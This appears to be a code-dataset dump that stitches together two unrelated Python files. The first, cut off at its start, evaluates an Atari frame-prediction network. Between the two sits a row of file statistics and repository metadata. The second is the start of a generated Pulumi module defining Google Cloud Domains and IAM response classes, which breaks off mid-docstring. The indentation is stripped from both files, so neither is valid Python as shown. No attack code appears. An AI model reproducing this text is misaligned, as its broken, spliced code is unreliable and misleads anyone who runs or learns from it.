sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
#gameDir = 'results/SItest/'+game
#print(gameDir)
#pretrained = modelDir+'/acvp-'+game+str(trainingSize)+'pre.bin'
#pretrained = '/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/SpaceInvadersNoFrameskip-v42518/models/acvp-SpaceInvadersNoFrameskip-v4-09.bin'
#if os.path.exists(pretrained):
#net.load_state_dict(torch.load(pretrained))
net.load_state_dict(torch.load('/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/QbertNoFrameskip-v412small/models/acvp-QbertNoFrameskip-v4-09.bin'))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
mkdir(gameDir)
test_ep = 42
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(32, [frames, actions, targets])
count = 0
losses = []
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), gameDir+'/%s-%02d-input.png' % (game, count))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), gameDir+'/%s-%02d-truth.png' % (game, count))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), gameDir+'/%s-%02d.png' % (game, count))
count += 1
def testSingleGame(game, numEpoch, batchSize, trainingSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 18
net = Network(num_actions)
#Look for checkpoint
#pretrained = modelDir+'/acvp-'+game+'-08.bin'
for x in trainingSize:
gameDir = 'tests/'+game+str(x)
print(gameDir)
sampleDir = gameDir+ '/samples'
pretrained = '/home/matias/Documents/fall2019/rl/DeepRL_pytorch/resultsNew2/MsPacmanNoFrameskip-v4'+str(x)+'/models/acvp-msPacmanNoFrameskip-v4-09.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
print("Grabbed Pretrained:" + pretrained)
#net.load_state_dict(torch.load('/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/MultiPB6/models/acvp-MultiPB-19.bin'))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
#trainSplit = float(trainingSize/100)
#train_episodes = int(episodes * trainSplit)
#test_episodes = episodes - int(episodes *(1-trainSplit))
test_episodes = episodes - int(episodes *(1-0.89))
#indices_train = np.arange(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
losses = []
#test_indices = range(test_episodes, episodes)
#ep_to_print = np.random.choice(test_indices)
#for test_ep in tqdm(test_indices):
test_ep = 39
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
#if test_ep == ep_to_print:
# test_batcher.reset()
# x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
#torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, iteration))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, iteration))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, iteration))
f = open(gameDir+ '/results.txt', 'a')
f.write('Iteration: ' + str(iteration)+ ', iter loss: ' + str(losses[iteration])+ '\n')
f.close()
iteration+=1
def testMGame():
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 18
#Look for checkpoint
#pretrained = modelDir+'/acvp-'+game+'-08.bin'
# with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
# meta = pickle.load(f)
# episodes = meta['episodes']
# mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP)/2
with open('%s/dataset/%s/meta.bin' % (PREFIX, 'BoxingNoFrameskip-v4'), 'rb') as f:
meta = pickle.load(f)
mean_obsBox = meta['mean_obs']
with open('%s/dataset/%s/meta.bin' % (PREFIX, 'QbertNoFrameskip-v4'), 'rb') as f:
meta = pickle.load(f)
mean_obsQ = meta['mean_obs']
with open('%s/dataset/%s/meta.bin' % (PREFIX, 'MsPacmanNoFrameskip-v4'), 'rb') as f:
meta = pickle.load(f)
mean_obsPac = meta['mean_obs']
diffBox = np.mean((mean_obsB-mean_obsBox)**2)
diffQ = np.mean((mean_obsB-mean_obsQ)**2)
diffPac = np.mean((mean_obsB-mean_obsPac)**2)
print(diffBox)
print(diffQ)
print(diffPac)
| 40.019743
| 162
| 0.587765
| 5,216
| 40,540
| 4.434241
| 0.066718
| 0.044965
| 0.032859
| 0.024861
| 0.852134
| 0.829262
| 0.821782
| 0.819361
| 0.798824
| 0.782913
| 0
| 0.032958
| 0.266527
| 40,540
| 1,012
| 163
| 40.059289
| 0.74488
| 0.179847
| 0
| 0.748899
| 0
| 0.001468
| 0.078205
| 0.028703
| 0
| 0
| 0
| 0
| 0.011747
| 1
| 0.048458
| false
| 0
| 0.023495
| 0.011747
| 0.117474
| 0.041116
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e809eee645cbb6f050d2504e0c012c7e9cde4bb
| 53,531
|
py
|
Python
|
sdk/python/pulumi_google_native/domains/v1beta1/outputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/domains/v1beta1/outputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/domains/v1beta1/outputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = [
'AuditConfigResponse',
'AuditLogConfigResponse',
'BindingResponse',
'ContactResponse',
'ContactSettingsResponse',
'CustomDnsResponse',
'DnsSettingsResponse',
'DsRecordResponse',
'ExprResponse',
'GlueRecordResponse',
'GoogleDomainsDnsResponse',
'ManagementSettingsResponse',
'PostalAddressResponse',
]
@pulumi.output_type
class AuditConfigResponse(dict):
"""
Specifies the audit configuration for a service. The configuration determines which permission types are logged, and what identities, if any, are exempted from logging. An AuditConfig must have one or more AuditLogConfigs. If there are AuditConfigs for both `allServices` and a specific service, the union of the two AuditConfigs is used for that service: the log_types specified in each AuditConfig are enabled, and the exempted_members in each AuditLogConfig are exempted. Example Policy with multiple AuditConfigs: { "audit_configs": [ { "service": "allServices", "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" }, { "log_type": "ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com", "audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type": "DATA_WRITE", "exempted_members": [ "user:aliya@example.com" ] } ] } ] } For sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also exempts jose@example.com from DATA_READ logging, and aliya@example.com from DATA_WRITE logging.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "auditLogConfigs":
suggest = "audit_log_configs"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AuditConfigResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AuditConfigResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AuditConfigResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
audit_log_configs: Sequence['outputs.AuditLogConfigResponse'],
service: str):
"""
Specifies the audit configuration for a service. The configuration determines which permission types are logged, and what identities, if any, are exempted from logging. An AuditConfig must have one or more AuditLogConfigs. If there are AuditConfigs for both `allServices` and a specific service, the union of the two AuditConfigs is used for that service: the log_types specified in each AuditConfig are enabled, and the exempted_members in each AuditLogConfig are exempted. Example Policy with multiple AuditConfigs: { "audit_configs": [ { "service": "allServices", "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" }, { "log_type": "ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com", "audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type": "DATA_WRITE", "exempted_members": [ "user:aliya@example.com" ] } ] } ] } For sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also exempts jose@example.com from DATA_READ logging, and aliya@example.com from DATA_WRITE logging.
:param Sequence['AuditLogConfigResponse'] audit_log_configs: The configuration for logging of each type of permission.
:param str service: Specifies a service that will be enabled for audit logging. For example, `storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special value that covers all services.
"""
pulumi.set(__self__, "audit_log_configs", audit_log_configs)
pulumi.set(__self__, "service", service)
@property
@pulumi.getter(name="auditLogConfigs")
def audit_log_configs(self) -> Sequence['outputs.AuditLogConfigResponse']:
"""
The configuration for logging of each type of permission.
"""
return pulumi.get(self, "audit_log_configs")
@property
@pulumi.getter
def service(self) -> str:
"""
Specifies a service that will be enabled for audit logging. For example, `storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special value that covers all services.
"""
return pulumi.get(self, "service")
@pulumi.output_type
class AuditLogConfigResponse(dict):
"""
Provides the configuration for logging a type of permissions. Example: { "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" } ] } This enables 'DATA_READ' and 'DATA_WRITE' logging, while exempting jose@example.com from DATA_READ logging.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "exemptedMembers":
suggest = "exempted_members"
elif key == "logType":
suggest = "log_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AuditLogConfigResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AuditLogConfigResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AuditLogConfigResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
exempted_members: Sequence[str],
log_type: str):
"""
Provides the configuration for logging a type of permissions. Example: { "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" } ] } This enables 'DATA_READ' and 'DATA_WRITE' logging, while exempting jose@example.com from DATA_READ logging.
:param Sequence[str] exempted_members: Specifies the identities that do not cause logging for this type of permission. Follows the same format of Binding.members.
:param str log_type: The log type that this config enables.
"""
pulumi.set(__self__, "exempted_members", exempted_members)
pulumi.set(__self__, "log_type", log_type)
@property
@pulumi.getter(name="exemptedMembers")
def exempted_members(self) -> Sequence[str]:
"""
Specifies the identities that do not cause logging for this type of permission. Follows the same format of Binding.members.
"""
return pulumi.get(self, "exempted_members")
@property
@pulumi.getter(name="logType")
def log_type(self) -> str:
"""
The log type that this config enables.
"""
return pulumi.get(self, "log_type")
@pulumi.output_type
class BindingResponse(dict):
"""
Associates `members`, or principals, with a `role`.
"""
def __init__(__self__, *,
condition: 'outputs.ExprResponse',
members: Sequence[str],
role: str):
"""
Associates `members`, or principals, with a `role`.
:param 'ExprResponse' condition: The condition that is associated with this binding. If the condition evaluates to `true`, then this binding applies to the current request. If the condition evaluates to `false`, then this binding does not apply to the current request. However, a different role binding might grant the same role to one or more of the principals in this binding. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
:param Sequence[str] members: Specifies the principals requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `alice@example.com` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other-app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address that represents a Google group. For example, `admins@example.com`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `alice@example.com?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other-app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `admins@example.com?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`.
:param str role: Role that is assigned to the list of `members`, or principals. For example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
pulumi.set(__self__, "condition", condition)
pulumi.set(__self__, "members", members)
pulumi.set(__self__, "role", role)
@property
@pulumi.getter
def condition(self) -> 'outputs.ExprResponse':
"""
The condition that is associated with this binding. If the condition evaluates to `true`, then this binding applies to the current request. If the condition evaluates to `false`, then this binding does not apply to the current request. However, a different role binding might grant the same role to one or more of the principals in this binding. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def members(self) -> Sequence[str]:
"""
Specifies the principals requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `alice@example.com` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other-app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address that represents a Google group. For example, `admins@example.com`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `alice@example.com?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other-app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `admins@example.com?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`.
"""
return pulumi.get(self, "members")
@property
@pulumi.getter
def role(self) -> str:
"""
Role that is assigned to the list of `members`, or principals. For example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
return pulumi.get(self, "role")
@pulumi.output_type
class ContactResponse(dict):
"""
Details required for a contact associated with a `Registration`.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "faxNumber":
suggest = "fax_number"
elif key == "phoneNumber":
suggest = "phone_number"
elif key == "postalAddress":
suggest = "postal_address"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ContactResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ContactResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ContactResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
email: str,
fax_number: str,
phone_number: str,
postal_address: 'outputs.PostalAddressResponse'):
"""
Details required for a contact associated with a `Registration`.
:param str email: Email address of the contact.
:param str fax_number: Fax number of the contact in international format. For example, `"+1-800-555-0123"`.
:param str phone_number: Phone number of the contact in international format. For example, `"+1-800-555-0123"`.
:param 'PostalAddressResponse' postal_address: Postal address of the contact.
"""
pulumi.set(__self__, "email", email)
pulumi.set(__self__, "fax_number", fax_number)
pulumi.set(__self__, "phone_number", phone_number)
pulumi.set(__self__, "postal_address", postal_address)
@property
@pulumi.getter
def email(self) -> str:
"""
Email address of the contact.
"""
return pulumi.get(self, "email")
@property
@pulumi.getter(name="faxNumber")
def fax_number(self) -> str:
"""
Fax number of the contact in international format. For example, `"+1-800-555-0123"`.
"""
return pulumi.get(self, "fax_number")
@property
@pulumi.getter(name="phoneNumber")
def phone_number(self) -> str:
"""
Phone number of the contact in international format. For example, `"+1-800-555-0123"`.
"""
return pulumi.get(self, "phone_number")
@property
@pulumi.getter(name="postalAddress")
def postal_address(self) -> 'outputs.PostalAddressResponse':
"""
Postal address of the contact.
"""
return pulumi.get(self, "postal_address")
@pulumi.output_type
class ContactSettingsResponse(dict):
"""
Defines the contact information associated with a `Registration`. [ICANN](https://icann.org/) requires all domain names to have associated contact information. The `registrant_contact` is considered the domain's legal owner, and often the other contacts are identical.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "adminContact":
suggest = "admin_contact"
elif key == "registrantContact":
suggest = "registrant_contact"
elif key == "technicalContact":
suggest = "technical_contact"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ContactSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ContactSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ContactSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
admin_contact: 'outputs.ContactResponse',
privacy: str,
registrant_contact: 'outputs.ContactResponse',
technical_contact: 'outputs.ContactResponse'):
"""
Defines the contact information associated with a `Registration`. [ICANN](https://icann.org/) requires all domain names to have associated contact information. The `registrant_contact` is considered the domain's legal owner, and often the other contacts are identical.
:param 'ContactResponse' admin_contact: The administrative contact for the `Registration`.
:param str privacy: Privacy setting for the contacts associated with the `Registration`.
:param 'ContactResponse' registrant_contact: The registrant contact for the `Registration`. *Caution: Anyone with access to this email address, phone number, and/or postal address can take control of the domain.* *Warning: For new `Registration`s, the registrant receives an email confirmation that they must complete within 15 days to avoid domain suspension.*
:param 'ContactResponse' technical_contact: The technical contact for the `Registration`.
"""
pulumi.set(__self__, "admin_contact", admin_contact)
pulumi.set(__self__, "privacy", privacy)
pulumi.set(__self__, "registrant_contact", registrant_contact)
pulumi.set(__self__, "technical_contact", technical_contact)
@property
@pulumi.getter(name="adminContact")
def admin_contact(self) -> 'outputs.ContactResponse':
"""
The administrative contact for the `Registration`.
"""
return pulumi.get(self, "admin_contact")
@property
@pulumi.getter
def privacy(self) -> str:
"""
Privacy setting for the contacts associated with the `Registration`.
"""
return pulumi.get(self, "privacy")
@property
@pulumi.getter(name="registrantContact")
def registrant_contact(self) -> 'outputs.ContactResponse':
"""
The registrant contact for the `Registration`. *Caution: Anyone with access to this email address, phone number, and/or postal address can take control of the domain.* *Warning: For new `Registration`s, the registrant receives an email confirmation that they must complete within 15 days to avoid domain suspension.*
"""
return pulumi.get(self, "registrant_contact")
@property
@pulumi.getter(name="technicalContact")
def technical_contact(self) -> 'outputs.ContactResponse':
"""
The technical contact for the `Registration`.
"""
return pulumi.get(self, "technical_contact")
@pulumi.output_type
class CustomDnsResponse(dict):
"""
Configuration for an arbitrary DNS provider.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "dsRecords":
suggest = "ds_records"
elif key == "nameServers":
suggest = "name_servers"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in CustomDnsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
CustomDnsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
CustomDnsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ds_records: Sequence['outputs.DsRecordResponse'],
name_servers: Sequence[str]):
"""
Configuration for an arbitrary DNS provider.
:param Sequence['DsRecordResponse'] ds_records: The list of DS records for this domain, which are used to enable DNSSEC. The domain's DNS provider can provide the values to set here. If this field is empty, DNSSEC is disabled.
:param Sequence[str] name_servers: A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format.
"""
pulumi.set(__self__, "ds_records", ds_records)
pulumi.set(__self__, "name_servers", name_servers)
@property
@pulumi.getter(name="dsRecords")
def ds_records(self) -> Sequence['outputs.DsRecordResponse']:
"""
The list of DS records for this domain, which are used to enable DNSSEC. The domain's DNS provider can provide the values to set here. If this field is empty, DNSSEC is disabled.
"""
return pulumi.get(self, "ds_records")
@property
@pulumi.getter(name="nameServers")
def name_servers(self) -> Sequence[str]:
"""
A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format.
"""
return pulumi.get(self, "name_servers")
@pulumi.output_type
class DnsSettingsResponse(dict):
"""
Defines the DNS configuration of a `Registration`, including name servers, DNSSEC, and glue records.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "customDns":
suggest = "custom_dns"
elif key == "glueRecords":
suggest = "glue_records"
elif key == "googleDomainsDns":
suggest = "google_domains_dns"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DnsSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DnsSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DnsSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
custom_dns: 'outputs.CustomDnsResponse',
glue_records: Sequence['outputs.GlueRecordResponse'],
google_domains_dns: 'outputs.GoogleDomainsDnsResponse'):
"""
Defines the DNS configuration of a `Registration`, including name servers, DNSSEC, and glue records.
:param 'CustomDnsResponse' custom_dns: An arbitrary DNS provider identified by its name servers.
:param Sequence['GlueRecordResponse'] glue_records: The list of glue records for this `Registration`. Commonly empty.
:param 'GoogleDomainsDnsResponse' google_domains_dns: The free DNS zone provided by [Google Domains](https://domains.google/).
"""
pulumi.set(__self__, "custom_dns", custom_dns)
pulumi.set(__self__, "glue_records", glue_records)
pulumi.set(__self__, "google_domains_dns", google_domains_dns)
@property
@pulumi.getter(name="customDns")
def custom_dns(self) -> 'outputs.CustomDnsResponse':
"""
An arbitrary DNS provider identified by its name servers.
"""
return pulumi.get(self, "custom_dns")
@property
@pulumi.getter(name="glueRecords")
def glue_records(self) -> Sequence['outputs.GlueRecordResponse']:
"""
The list of glue records for this `Registration`. Commonly empty.
"""
return pulumi.get(self, "glue_records")
@property
@pulumi.getter(name="googleDomainsDns")
def google_domains_dns(self) -> 'outputs.GoogleDomainsDnsResponse':
"""
The free DNS zone provided by [Google Domains](https://domains.google/).
"""
return pulumi.get(self, "google_domains_dns")
@pulumi.output_type
class DsRecordResponse(dict):
"""
Defines a Delegation Signer (DS) record, which is needed to enable DNSSEC for a domain. It contains a digest (hash) of a DNSKEY record that must be present in the domain's DNS zone.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "digestType":
suggest = "digest_type"
elif key == "keyTag":
suggest = "key_tag"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DsRecordResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DsRecordResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DsRecordResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
algorithm: str,
digest: str,
digest_type: str,
key_tag: int):
"""
Defines a Delegation Signer (DS) record, which is needed to enable DNSSEC for a domain. It contains a digest (hash) of a DNSKEY record that must be present in the domain's DNS zone.
:param str algorithm: The algorithm used to generate the referenced DNSKEY.
:param str digest: The digest generated from the referenced DNSKEY.
:param str digest_type: The hash function used to generate the digest of the referenced DNSKEY.
:param int key_tag: The key tag of the record. Must be set in range 0 -- 65535.
"""
pulumi.set(__self__, "algorithm", algorithm)
pulumi.set(__self__, "digest", digest)
pulumi.set(__self__, "digest_type", digest_type)
pulumi.set(__self__, "key_tag", key_tag)
@property
@pulumi.getter
def algorithm(self) -> str:
"""
The algorithm used to generate the referenced DNSKEY.
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter
def digest(self) -> str:
"""
The digest generated from the referenced DNSKEY.
"""
return pulumi.get(self, "digest")
@property
@pulumi.getter(name="digestType")
def digest_type(self) -> str:
"""
The hash function used to generate the digest of the referenced DNSKEY.
"""
return pulumi.get(self, "digest_type")
@property
@pulumi.getter(name="keyTag")
def key_tag(self) -> int:
"""
The key tag of the record. Must be set in range 0 -- 65535.
"""
return pulumi.get(self, "key_tag")
@pulumi.output_type
class ExprResponse(dict):
"""
Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information.
"""
def __init__(__self__, *,
description: str,
expression: str,
location: str,
title: str):
"""
Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information.
:param str description: Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI.
:param str expression: Textual representation of an expression in Common Expression Language syntax.
:param str location: Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file.
:param str title: Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs which allow to enter the expression.
"""
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "location", location)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def description(self) -> str:
"""
Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def expression(self) -> str:
"""
Textual representation of an expression in Common Expression Language syntax.
"""
return pulumi.get(self, "expression")
@property
@pulumi.getter
def location(self) -> str:
"""
Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def title(self) -> str:
"""
Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs which allow to enter the expression.
"""
return pulumi.get(self, "title")
@pulumi.output_type
class GlueRecordResponse(dict):
"""
Defines a host on your domain that is a DNS name server for your domain and/or other domains. Glue records are a way of making the IP address of a name server known, even when it serves DNS queries for its parent domain. For example, when `ns.example.com` is a name server for `example.com`, the host `ns.example.com` must have a glue record to break the circular DNS reference.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "hostName":
suggest = "host_name"
elif key == "ipv4Addresses":
suggest = "ipv4_addresses"
elif key == "ipv6Addresses":
suggest = "ipv6_addresses"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in GlueRecordResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
GlueRecordResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
GlueRecordResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
host_name: str,
ipv4_addresses: Sequence[str],
ipv6_addresses: Sequence[str]):
"""
